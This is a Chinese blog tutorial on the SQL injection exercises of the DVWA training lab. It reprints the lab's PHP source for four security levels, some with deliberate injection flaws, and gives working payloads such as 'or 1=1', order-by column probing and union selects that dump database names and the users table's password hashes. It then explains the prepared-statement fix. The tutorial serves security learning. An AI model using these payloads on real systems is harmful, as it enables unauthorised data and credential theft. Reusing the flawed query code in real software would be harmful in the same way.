DVWA之SQL注入(小白友好)

最新推荐文章于 2023-09-16 22:47:49 发布
最新推荐文章于 2023-09-16 22:47:49 发布
阅读量370 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chtdgf/article/details/113743626
版权

DVWA之SQL注入(SQL Injection)

具体分析来自B站资源
https://www.bilibili.com/video/BV1Di4y1u7s6?p=18

一 LOW级别

1.PHP代码分析

我们可以通过 View Source获得代码如下

<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}
?>

代码分析如下
在这里插入图片描述在这里插入图片描述在这里插入图片描述这里推荐W3school可以查询PHP的函数等基础知识

2.SQL注入

在这里插入图片描述我们可以判断一下此题可以选用什么类型的注入
当我们输入 3 时
在这里插入图片描述而当我们输入1+2时
在这里插入图片描述如果为数字型,两者返回结果应相同(在数字型中1+2会数字运算得出结果为3,所以两者返回结果会相同),所以此处应为字符型注入。

我们不妨尝试字符型注入。
在这里插入图片描述此次注入的重点在于查询语句,如下
“SELECT first_name, last_name FROM users WHERE user_id = ‘$id’;”
在运行时,我们在id框内输入的id被赋予变量,会原原本本地出现在单引号之间,所以我们需要考虑与原语句中单引号的闭合问题。我们可以尝试以下语句。

例如
SELECT first_name, last_name FROM users WHERE user_id = ’ ’ or 1=1 or ’ ';
在这里插入图片描述
SELECT first_name, last_name FROM users WHERE user_id = ‘1’ or ‘1’=‘1’;
在这里插入图片描述

我们也可以进行手工SQL注入
在这里插入图片描述1.判断字段数目
1’ order by 1 # (#可以注释掉后面的单引号)
在这里插入图片描述
1’ order by 2 #
在这里插入图片描述
1’ order by 3 #
在这里插入图片描述

此时会报错,说明数据库中只有两列,那么我们就可以构造联合查询了
1’ union select 1,2 #
在这里插入图片描述我们发现这两个字段都可以回显,就可以去找当前的名字,数据库的名字
1’ union select user(),database() #
在这里插入图片描述’ union select user,password from users #
在这里插入图片描述加密的密码解密即为password。

二 MEDIUM级别

1.PHP代码分析

在这里插入图片描述我们可以通过 View Source获得代码如下

 <?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Display values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    //mysql_close();
}
?>

对比后我们可以发现二者最大的差别在于
$id = mysql_real_escape_string( $id );
在这里插入图片描述“SELECT first_name, last_name FROM users WHERE user_id = $id;”;
此时为数字型

2.SQL注入

直接注入 id=1 or 1=1
手工SQL注入同上
我们可以使用hackbar进行注入
(hackbar教程https://www.cnblogs.com/wayne-tao/p/11027650.html)
在这里插入图片描述

三 HIGH级别

1.PHP代码分析

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

1.输入参数不存在转义。
2.在拼接id到T-SQL语句时,多了单引号。
3.SQL语句末尾多了limit,限制只返回第一条记录。(可注释绕过)
4.高级代码的输入页面与结果回显页面是两个页面,本意是想防自动化工具,但仍可用second-order命令绕过限制。

2.SQL注入

1’ or 1=1#
1’ and 1=2 union select database(),2#
在这里插入图片描述在这里插入图片描述

四 IMPOSSIBLE级别

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

根据代码可以得知
1.多了token检查。
2.使用get方法获取参数,参数必须为数字。
3.使用PDO方式查询数据,实现命令与数据分离更安全。

烷加烯
关注
DVWA通关攻略之SQL注入
hongji728696的博客
09-03 1010
SQL注入是发生在应用程序与数据库的安全漏洞,简而言之,即黑客将Web页面原参数修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行SQL命令,从而实现获取数据库的信息以及提权目的的一种技术。
DVWASQL注入
geejkse_seff的博客
07-30 384
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA下的SQL注入
07-25
SQL
DVWA SQL注入
Xiayuyuren_Study的博客
06-21 504
SQL注入漏洞作为OWASP TOP10中重要的一部分 一、原理 通过web程序,在数据库里执行任意SQL语句。根源在于程序命令和用户数据(用户输入)之间没有做到分开。 二、发现 1、确认注入POC (1)检测是否存在注入: 可以得知此处位注入点,尝试输入 ‘ (英文单引号)时,出现如下错误提示: You have an error in your SQL syntax; check t...
DVWA-SQL注入
acdcccc的博客
08-26 328
分享DVWA靶场的SQL注入过程
DVWA——SQL注入
qq_62803993的博客
01-08 2488
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
dvwa——sql注入
GZY0601的博客
09-16 654
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1060
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
DVWAsql注入(一)
ximo的博客
01-21 325
DVWAsql注入(一) 一、低级别 1.输入ID得到回显: 2.判断注入方式: 输入1’ and ‘1’ = ‘1’ # 成功回显: 输入1’ and ‘1’ = ‘2’ # 回显失败: 判断为单引号字符型注入。 3.判断列数与数据回显位置 使用 order by 语句判断列数。 使用 1’ order by 3 # 出现报错: 使用 1’ order by 2 # 成功回显,说明列数为 2: 4.使用 union 联合注入查询,可回显位置并获得当前库 使用 -1’ union select
DVWASQL注入(SQL Injection)
qq_39682037的博客
03-20 2243
SQL注入(SQL Injection) SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 Security Level: low 测试流程 输入1 输入2 输入1‘,无响应 输入1 and 1=1 输入1 and 1=2 故猜测sql语句结构为 select First name的列名 and Surname的列名 from ...
dvwasql注入
BAIXUAN9527的博客
03-27 537
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL在数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
DVWA-sql注入
Darklord.W
04-09 386
sql注入低中高步骤截图及说明 低: 判断注入类型 判断字段数 判断回显位置 查询数据库版本以及数据库名 查询数据库内表名 查询表内字段名 查询用户名密码 中: 发送到repeater 判断注入类型 猜字段数 判断回显位置 查询版本以及数据库 查询表名 查询字段名 高: Hig...
dvwasql注入(低级)
最新发布
12-21
DVWA中进行SQL注入(低级)的操作如下: 1. 打开DVWA平台并登录。 2. 在左侧导航栏中选择"SQL Injection"。 3. 在"SQL Injection"页面中,选择"Low"级别。 4. 在页面上方的输入框中输入一个单引号(')并点击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值